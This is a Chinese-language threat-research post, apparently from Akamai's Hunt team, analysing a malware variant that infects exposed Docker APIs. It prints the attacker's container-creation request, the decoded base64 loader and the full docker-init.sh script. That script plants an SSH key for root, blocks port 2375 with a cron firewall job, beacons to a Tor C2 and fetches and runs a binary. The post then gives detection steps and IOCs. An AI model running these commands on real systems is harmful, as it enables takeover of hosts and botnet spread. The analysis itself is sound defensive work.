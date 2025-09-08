X

了解我们在中国开展业务的承诺。

小心！新型恶意软件变种瞄准暴露的 API

Sep 08, 2025

寫於

Yonatan Gilvarg is a Senior Security Researcher on the Akamai Hunt Team. His areas of expertise include threat detection and research, big data anomaly detection, and incident response.

分享

内容提要

  • Akamai Hunt 团队发现了一种专门针对暴露的 Docker API 的新型恶意软件变种，该变种还具备扩大感染范围的能力。2025 年 8 月，我们在 Akamai 的蜜罐基础架构中完成了对该变种的最近一次监测。

  • 2025 年 6 月，Trend Micro 的 Threat Intelligence 团队首次报告了该恶意软件。他们发现的这个变种，会通过一个 Tor 域名投放加密挖矿软件。

  • 而 Akamai Hunt 团队观察到的变种，它的初始访问途径与初始变种不同，它会阻止他人从互联网访问 Docker API。

  • 它的二进制文件也有差异。Akamai Hunt 团队发现的这个变种不会投放加密挖矿软件，但是会投放文件，文件中带有初始变种曾使用过的工具，且具有初始变种不具备的感染能力。 

  • 本博文将详细介绍初始变种的详情、两个变种之间的区别以及可助力防御该威胁的入侵指标 (IOC)。 

跳转至 IOC

简介

我们的数字生态系统关联越紧密，攻击者可藏匿的空间就越大，即便被发现，攻击者也能凭借“跳板”技术继续隐藏。一旦某种新型威胁媒介或恶意软件变种被人发现和报告，攻击者可能会再次修改相应的恶意软件，而且只需短短数小时或数天即可完成。

Akamai Hunt 团队发现了一种专门针对暴露的 Docker API 的新型活跃攻击活动。该新型变种使用的工具似乎与初始变种相同，但最终目的可能不同，它可能会为了构建复杂僵尸网络做好某些基础准备

本博文将详细剖析该恶意软件变种的技术细节、攻击链和抵御策略。

跳转到检测措施

初始威胁概要

2025 年 6 月，Trend Micro 的 Threat Intelligence 团队报告了一种恶意软件，它会针对暴露的远程 Docker API 发起攻击并投放加密挖矿软件。而且，恶意软件作者还使用 Tor 域名来掩盖自己的身份。

攻击者首先攻击错误配置的 Docker API，获得访问权限，随后执行一款基于 alpine 的 Docker 映像的新型容器，并将主机的文件系统挂载到该容器中。随后，攻击者执行一段经过 Base64 编码的有效负载，该负载会从一个 .onion 服务器下载恶意 shell 脚本，再用脚本修改主机的 SSH 配置，实现对主机的持久控制。

下载负载还会安装各种工具，包括 masscan 和 torsocks，使用 Tor 域名将目标系统信息信标上报到攻击者的命令和控制 (C2) 服务器。随后，攻击者下载并执行一个包含 XMRig 加密货币挖矿软件且经过 Zstandard 压缩的二进制文件。

我们的调查研究

在一项常规研究中，我们监测到来自多个 IP 地址的 HTTP 请求想要访问我们的 Docker API，这些请求试图在我们的某台服务器上创建一个新容器（见图 1）。这事引起了我们的关注，相关调查随即开展。

{
  "Image": "alpine:latest",
  "Cmd": [
    "sh",
    "-c",
    "export IP=<honeypot_ip>; echo YXBrIHVwZGF0ZSAmJiBhcGsgYWRkIGN1cmwgdG9yICYmIHRvciAmIHdoaWxlICEgY3VybCAtZnMgLS1wcm94eSBzb2NrczVoOi8vbG9jYWxob3N0OjkwNTAgaHR0cHM6Ly9jaGVja2lwLmFtYXpvbmF3cy5jb207IGRvIHNsZWVwIDEwOyBkb25lOyBjdXJsIC1mcyAtLXByb3h5IHNvY2tzNWg6Ly9sb2NhbGhvc3Q6OTA1MCBodHRwOi8vd3R4cWY1NGRqaHA1cHNrdjJsZnlkdXViNWlldnhieXZsempnam9wazZoeGdlNXVtb21icjYzYWQub25pb24vc3RhdGljL2RvY2tlci1pbml0LnNoIHwgc2g= | base64 -d | sh"
  ],
  "Tty": true,
  "HostConfig": {
    "Binds": [
      "/:/hostroot:rw"
    ],
    "RestartPolicy": {
      "MaximumRetryCount": 0,
      "Name": "always"
    }
  }
}
Fig. 1: HTTP request to create a new Docker container

攻击者挂载了主机的文件系统，并执行了一个经过 Base64 编码的脚本。这种异常行为值得我们进一步调查，以便查明新建容器的目标是什么。将恶意软件样本解码后，我们发现，攻击者的目标是创建容器，并从某个 Tor 域名获取一个脚本（见图 2）。

apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip.amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | sh
Fig. 2: Decoded command intended to set up maliciously created container for exploit

该脚本共有两个运行阶段：

  • 第 1 阶段：环境准备
    • 安装 curl tor
    • 在后台开启 Tor 守护程序
    • 使用 checkip.amazonaws.com 域名获取受害服务器的公共 IP
  • 第 2 阶段：检索和执行
    • 从某个 Tor 域名获取名为 docker-init.sh 的脚本（见图 3）
#!/bin/sh
echo "Karuizawa running..."
if [ -d "/hostroot" ]; then
SC="/hostroot/etc/ssh/sshd_config";{ printf "PermitRootLogin yes\nPubkeyAuthentication yes\n"; cat $SC; } > t.txt && mv t.txt $SC && echo "ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBAHTVlJAQr3MiANW6KZjiPrzlIsVXkATKxKGrwFM4ylE31c4psnz1NdsKVSG7mVmB3bjmBRL3d4JmpKNByGPXeF9LgAOU4t5Olcwhl0x+ci8zwg6xV+dq/YABOxNZr5MI1dVfkmZ86+iGRnt03TB28n0RH1zbJ+x21jw5iJSwoUe+rkD1A==" >> /hostroot/root/.ssh/authorized_keys
echo "* * * * * root echo 'aWYgY29tbWFuZCAtdiBzeXN0ZW1jdGwgJj4gL2Rldi9udWxsOyB0aGVuCiAgICBzeXN0ZW1jdGwgcmVsb2FkIHNzaGQgMj4vZGV2L251bGwgfHwgc3lzdGVtY3RsIHJlbG9hZCBzc2gKZWxpZiBbIC14IC9ldGMvaW5pdC5kL3NzaCBdOyB0aGVuCiAgICAvZXRjL2luaXQuZC9zc2ggcmVsb2FkCmVsaWYgWyAteCAvZXRjL2luaXQuZC9zc2hkIF07IHRoZW4KICAgIC9ldGMvaW5pdC5kL3NzaGQgcmVsb2FkCmVsc2UKICAgIGVjaG8gImVyciIKZmkKClBPUlQ9MjM3NQpQUk9UT0NPTD10Y3AKCmZvciBmdyBpbiBmaXJld2FsbC1jbWQgdWZ3IHBmY3RsIGlwdGFibGVzIG5mdDsgZG8KICBpZiBjb21tYW5kIC12ICIkZnciID4vZGV2L251bGwgMj4mMTsgdGhlbgogICAgY2FzZSAiJGZ3IiBpbgogICAgICBmaXJld2FsbC1jbWQpCiAgICAgICAgZmlyZXdhbGwtY21kIC0tcGVybWFuZW50IC0tem9uZT1wdWJsaWMgLS1hZGQtcmljaC1ydWxlPSJydWxlIGZhbWlseT0naXB2NCcgcG9ydCBwb3J0PScke1BPUlR9JyBwcm90b2NvbD0nJHtQUk9UT0NPTH0nIHJlamVjdCIKICAgICAgICBmaXJld2FsbC1jbWQgLS1yZWxvYWQKICAgICAgICA7OwogICAgICB1ZncpCiAgICAgICAgdWZ3IGRlbnkgIiR7UE9SVH0vJHtQUk9UT0NPTH0iCiAgICAgICAgdWZ3IHJlbG9hZAogICAgICAgIDs7CiAgICAgIHBmY3RsKQogICAgICAgIGVjaG8gImJsb2NrIGRyb3AgcHJvdG8gJHtQUk9UT0NPTH0gZnJvbSBhbnkgdG8gYW55IHBvcnQgJHtQT1JUfSIgfCBwZmN0bCAtYSBjdXN0b21fYmxvY2sgLWYgLQogICAgICAgIDs7CiAgICAgIGlwdGFibGVzKQogICAgICAgIGlwdGFibGVzIC1JIElOUFVUIDEgLXAgIiR7UFJPVE9DT0x9IiAtLWRwb3J0ICIke1BPUlR9IiAtaiBEUk9QCiAgICAgICAgOzsKICAgICAgbmZ0KQogICAgICAgIGlmICEgbmZ0IGxpc3QgdGFibGVzIHwgZ3JlcCAtcSAiaW5ldCI7IHRoZW4KICAgICAgICAgIG5mdCBhZGQgdGFibGUgaW5ldAogICAgICAgICAgbmZ0IGFkZCBjaGFpbiBpbmV0IGZpbHRlciB7IHR5cGUgZmlsdGVyIGhvb2sgaW5wdXQgcHJpb3JpdHkgMCBcOyB9CiAgICAgICAgZmkKICAgICAgICBuZnQgYWRkIHJ1bGUgaW5ldCBmaWx0ZXIgaW5wdXQgIiR7UFJPVE9DT0x9IiBkcG9ydCAiJHtQT1JUfSIgZHJvcAogICAgICAgIDs7CiAgICBlc2FjCiAgICBicmVhawogIGZpCmRvbmUKCmVjaG8gIiIgPiAvZXRjL2Nyb250YWIK' | base64 -d | sh" >> /hostroot/etc/crontab
fi
apk add masscan libpcap libpcap-dev zstd torsocks
curl --proxy socks5h://localhost:9050 http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/bot/add -X POST -H "Content-Type: application/json" -d '{"enter": "docker", "ip": "'$IP'", "arch": "'$(uname -m)'" }'
torsocks wget -O /tmp/system.zst "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion:9000/binary/system-linux-$(uname -m).zst"
zstd -d /tmp/system.zst -o /tmp/system
chmod +x /tmp/system
ulimit -n 65535
/tmp/system
sleep 30
Fig. 3: docker-init.sh fetched from .onion Tor domain

分析 docker-init.sh 脚本

在对图 3 中的脚本进行分析后，我们发现，该脚本会执行多种持久化和防御规避步骤，包括阻断后续对该暴露实例的访问，而我们在先前的变种中尚未见过这种特征。

  • 通过 SSH 实现 root 权限持久控制：该脚本会将攻击者控制的公钥追加写入 /root/.ssh/authorized_keys。 

  • 安装：该脚本随后会添加用于传播、持久控制和规避检测的多种工具（masscanlibpcaplibpcap-dev, zstdtorsocks）。

  • 掌控访问权限：攻击者将脚本中经过 Base64 编码的命令写入 /hostroot/etc/crontab 后，会创建一个每分钟执行一次的 Cron 作业，该作业会逐一调用并操作多个防火墙工具firewall-cmdufwpfctliptablesnft）来阻止对端口 2375 (Docker API) 的访问（见图 4）。
PORT=2375
PROTOCOL=tcp

for fw in firewall-cmd ufw pfctl iptables nft; do
  if command -v "$fw" >/dev/null 2>&1; then
    case "$fw" in
      firewall-cmd)
        firewall-cmd --permanent --zone=public --add-rich-rule="rule family='ipv4' port port='${PORT}' protocol='${PROTOCOL}' reject"
        firewall-cmd --reload
        ;;
      ufw)
        ufw deny "${PORT}/${PROTOCOL}"
        ufw reload
        ;;
      pfctl)
        echo "block drop proto ${PROTOCOL} from any to any port ${PORT}" | pfctl -a custom_block -f -
        ;;
      iptables)
        iptables -I INPUT 1 -p "${PROTOCOL}" --dport "${PORT}" -j DROP
        ;;
      nft)
        if ! nft list tables | grep -q "inet"; then
          nft add table inet
          nft add chain inet filter { type filter hook input priority 0 \; }
        fi
        nft add rule inet filter input "${PROTOCOL}" dport "${PORT}" drop
        ;;
    esac
    break
  fi
done
Fig. 4: Decoded base64 from docker-init.sh

主机上已存在 crontab 文件，这是因为攻击者在创建容器时就将它挂载进了主机。这是一种独占战术，也就是说，攻击者将受害主机锁定，供自己独占使用，并阻止其他攻击者后续访问已暴露主机。这是该变种代码中的新代码片段，我们在以往的变种代码中从未见过，而且该片段目前尚无法被 VirusTotal 检测到。

随后，攻击者向自己的 C2 服务器发送 POST 请求，表明已成功入侵了 Docker 服务（见图 5）。

curl --proxy socks5h://localhost:9050 http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/bot/add -X POST -H "Content-Type: application/json" -d '{"enter": "docker", "ip": "'$IP'", "arch": "'$(uname -m)'" }'
Fig. 5: POST request to attacker-controlled C2 server

与 C2 服务器的通信一旦建立，该脚本便会从另一个 Tor 服务域名下载一个压缩二进制文件（见图 6）。

torsocks wget -O /tmp/system.zst "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion:9000/binary/system-linux-$(uname -m).zst"
Fig. 6: Compressed binary from Tor service

分析二进制文件

下载的第一个文件是用 Go 语言编写的投放器，已经带有需要投放的内容，因此不需要与外部的互联网通信

除了会投放二进制文件，它还会解析 utmp 文件，以查明当前登录设备的用户是谁。

图 7 展示了投放器的代码片段，其中含有一个“user”表情符号。这是一处有趣的“技术痕迹”，可能表示该投放器的开发用到了大语言模型 (LLM) 辅助，因为许多 LLM 在生成代码时，都喜欢加入表情符号

DDoS 攻击 Fig. 7: Screenshot of a binary file (with an emoji) that is trying to identify who is logged into the machine

投放的文件 (dockerd) 会执行masscan，这是一款非常适合此类大规模扫描的端口扫描工具（见图 8）。它会扫描其他开放的 2375 端口（Docker API 服务）。如果发现相应端口，它会采用同样的方法感染该端口：创建图 1 中展示的带有 Base64 编码命令的容器。

DDoS 攻击 Fig. 8: Screenshot of binary initiating masscan

尽管最开始的两个端点（Get、Start）用于传播恶意软件，最后的两个端点（Stop、Remove）却似乎用于识别其他攻击者部署的恶意容器（见图 9）。

DDoS 攻击 Fig. 9: Searching for ubuntu containers

这种识别方式是通过搜索 ubuntu 容器来实现的，我们的研究数据表明，许多攻击者会部署自带加密挖矿软件的 ubuntu 容器。我们的大多数蜜罐事件表明，攻击者最初使用 ubuntualpine 容器进行访问，随后使用 curl 命令访问恶意域名，下载恶意软件。

呼朋唤友

然而，对于该变种而言，最初的感染还不够。攻击者使用我们在图 1 中展示的 Base64 编码命令，加上其他配置参数，在利用 masscan 扫描的已暴露主机上创建新的恶意容器（见图 10）。

DDoS 攻击 Fig. 10: Building the body request for the container infection

尽管 masscan 只扫描端口 2375，但是该恶意软件还会检查另外两个端口：端口 23 (Telnet) 和端口 9222（这是供 Chromium 浏览器使用的远程调试端口），似乎还为这两个端口另外准备了针对性的感染技术。

据我们所知，尽管该恶意软件只扫描端口 2375，但是用于处理端口 23 和端口 9222 的逻辑模块目前并不可用，因此不会被执行。然而，既然目前已经存在功能实现，那么它将来可能会有相应的攻击能力。

端口 23

恶意软件针对端口 23 (Telnet) 使用了一系列已知的默认路由器和设备凭据（例如，Alphanetworks:wrgg15_di524PSEAdmin:$secure$）。它会记录下成功登录的信息，然后将成功登录信息连同目标 IP 和受害主机的身份验证凭据发送到 webhook [.] site 端点 (4fea5cbb-8863-4f25-862a-fd8f02095207)。

有趣的是，它还会假设场景：如果能使用“root”用户成功登录，它会认定该主机是一个蜜罐。这种假设的根据可能是：在默认配置下，Telnet 会拒绝 root 登录请求（见图 11）。

DDoS 攻击 Fig. 11: Sending Telnet credentials to a webhook

端口 9222

端口 9222 是 Google Chrome 和 Chromium 浏览器的默认远程调试端口，该端口用于暴露 DevTools 协议。如果该端口面向互联网开放，便可允许远程控制浏览器，引发安全风险。

该恶意软件会使用 chromedp，这是一款与 Chrome 或 Chromium 浏览器交互的 Go 语言库。这款语言库曾被滥用于实现多种目的：绕过 Chrome 的 应用绑定加密功能、远程连接 Chromium 会话、窃取 Cookie 和其它私人数据。

我们发现的恶意软件变种会使用 NewRemoteAllocatorNewContext，加上 http://<scanned_ip>:9222 参数，连接到具有开放远程端口的现有会话（见图 12）。

DDoS 攻击 Fig. 12: The use of NewRemoteAllocator and NewContext

该变种会导航到 http://checkip.amazonaws.com，并查询页面的 body。除此之外，我们尚未在该威胁媒介中发现其他活动。我们也无法找到该变种的更复杂版本。

最终，如果成功获取了页面的 body，该变种会调用名为 addHttpbot 的函数，利用该函数从暴露的 IP 发送一条 POST 请求到 http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/httpbot/add（请注意此处 http 端点的前缀），请求中携带了恶意软件所在设备的源 IP，以及它在端口 9222 上发现的目标地址。

理论上，在未来的变种中，攻击者访问远程可调试端口后，可能会采用多种恶意攻击方案，包括：

同样需要注意的是，如果采用 --remote-debugging-port 参数暴露 Chrome 浏览器，在默认情况下，该变种仅监听来自 localhost 的请求。如果将该端口暴露到互联网，则必须设置 --remote-debugging-address 参数。

该文件还会查询 ip-api 来获取 ASN 和地理位置信息，这一功能位于名为 IsAWSIP 的函数中，尽管我们尚无任何证据表明该变种有针对 AWS 的特定滥用行为或进一步的相关逻辑模块。但是，该变种的未来版本可能会具备逻辑模块。

从一些底层机制来看，我们相信该变种是某种复杂僵尸网络的初始版本，但迄今为止，我们尚未找到这种初始变种的完整样本。

检测威胁

您可以任意采用下列技术来检测该变种或类似变种的潜在感染：

  • 检查新部署的容器是否会先执行安装程序（例如 apt 或 yum 安装包），然后立即启动下载器（例如 curl 或 wget）。许多攻击者采用这种方式，在暴露的 Docker 容器中远程执行代码。

  • 查找互联网到端口 2375、端口 9222 和端口 23 之间的新建连接。同样，如果在您的网络中发现扫描工具的使用痕迹，则可能表示有侦查活动。

  • 监测经过 Base64 编码的命令，检查这些命令的执行位置和执行者是否有异常，当然，还要监测这些命令的具体解码内容。

  • 监测下载应用程序。检测这类下载进程对可疑域名的异常访问，这对于发现来自网络的初始入侵行为至关重要。

  • 留意哪些主要服务停用了端口监听功能。如果您的环境中有某项服务一直在某个端口监听，却突然无故停止，这种突变或许暗藏可疑之处。

  • 检查挂载了主机文件系统的新容器。如果新部署的容器开始访问敏感主机路径（例如，/、/var/run/docker.sock、/etc 等路径），则可能表示攻击正试图突破容器边界，或是要夺取对主机的高级控制权。

Akamai Hunt 的全天候安全监测服务可及时检测并调查此类异常，避免风险升级为实际威胁，从而为客户提供切实保障。

预防和补救

无论您是已发现感染情况，还是要从源头防范感染发生，这四条建议都能帮您提升环境的安全水平。

  1. 网络分段：将您的 Docker 环境与网络中的其余部分相互隔离。使用网络分段，限制攻击者在您的基础架构中横向移动的能力，并限制对 Docker API 的访问权限。

  2. 暴露：尽量减少暴露到互联网的服务数量。该恶意软件利用互联网访问端口 2375、端口 9222, 和端口 23 来实施攻击，而阻止这些访问可极大程度减轻威胁。

  3. Chrome 调试端口：使用 Chrome 调试端口 (9222) 的时候，要使用特定的远程 IP 地址，不要使用 0.0.0.0

  4. 密码轮换：安装新设备后，要更改默认凭据为强密码。

技术聚焦：Beelzebub 项目

在发现该变种的蜜罐中，我们使用了 Mario Candela 开发的卓越架构——Beelzebub 蜜罐项目架构。

Beelzebub 是开源的蜜罐架构，能让研究人员无需过多投入即可模拟高交互服务。您只需为每个服务编写简单的 YAML 文件，就能基于请求/响应模式模拟出完整的协议或 API（见图 13）。

该架构还支持接入大语言模型 (LLM) 生成动态响应，如此一来，攻击者会误以为自己在与真实 API 交互，而实际上是 LLM 在模拟真实 API 的响应

- regex: "^/_ping/?$"
    headers:
      - "Content-Type: text/plain; charset=utf-8"
      - "Server: Docker/24.0.7 (linux)"
      - "Api-Version: 1.43"
      - "Docker-Experimental: false"
      - "Ostype: linux"
    statusCode: 200
    handler: "OK"
Fig. 13: Example snippet

这段代码片段定义了攻击者查询 Docker API 的 /_ping 端点时，Beelzebub 该如何响应。蜜罐并未简单忽略该请求，而是返回了相应的标头信息和元数据，使其看起来就像一台运行着 Linux 系统且搭载 Docker 24.0.7 版本的真实服务器。代码片段中，handler 处只返回了一个“OK”，与真正的 Docker 守护程序完全一致。

您可以在我们的 GitHub 页面获取完整的 Docker API YAML 文件。

正在寻求主动监控方案？

新发现的这种 Docker 恶意软件变种突显了研究界继续开展研究工作的必要性，这些宝贵的研究成果可帮助防御者抵御威胁。攻击者始终魔高一丈，他们的手段往往有两种：第一种是利用已知威胁或漏洞，对攻击手段稍作修改便可逃避检测；第二种则更加恶劣，攻击者提前布局，为后续制造更大的破坏埋下伏笔。

攻击者可利用被滥用的 API，获得受感染系统的大部分控制权。将网络分段、限制在互联网上暴露的服务数量、修改默认凭据为强密码等防护措施的重要性不言而喻。企业采取这些措施，可在很大程度上减少漏洞，增强应对此类威胁的能力。

Akamai Hunt 团队将继续监控此类威胁，及时报告真实事件中的研究成果，为我们的客户和整个安全社区提供安全保障。请关注我们的社交媒体研究页面，随时了解 Hunt 团队和其余 Akamai 安全情报组的最新发现。

IOC

IOC

类型

wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion

域名

2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion

域名

webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207

URL

C38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c - docker-init.sh

散列值

649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 - system

散列值

9451d3dc4b0ff9ea6afa503ffbfcd877944cac0860d6a0b8779c2bb5d03d3446 - dockerd

散列值

什么是 Akamai Hunt？

Akamai Hunt 是主动式、实战型的威胁搜寻服务，持续监控异常情况与潜在威胁，可快速检测并及时调查异常，避免风险升级为实际威胁

依托 Akamai 庞大的蜜罐基础架构以及客户环境的直接交互反馈，我们能够洞察攻击者最新的技术手段、工具和行为模式。这些优势让我们能够基于真实的攻击者活动验证假设，利用一手情报完善检测机制，赶在威胁触及客户环境之前，预判下一步动向。

阅读更多研究报告
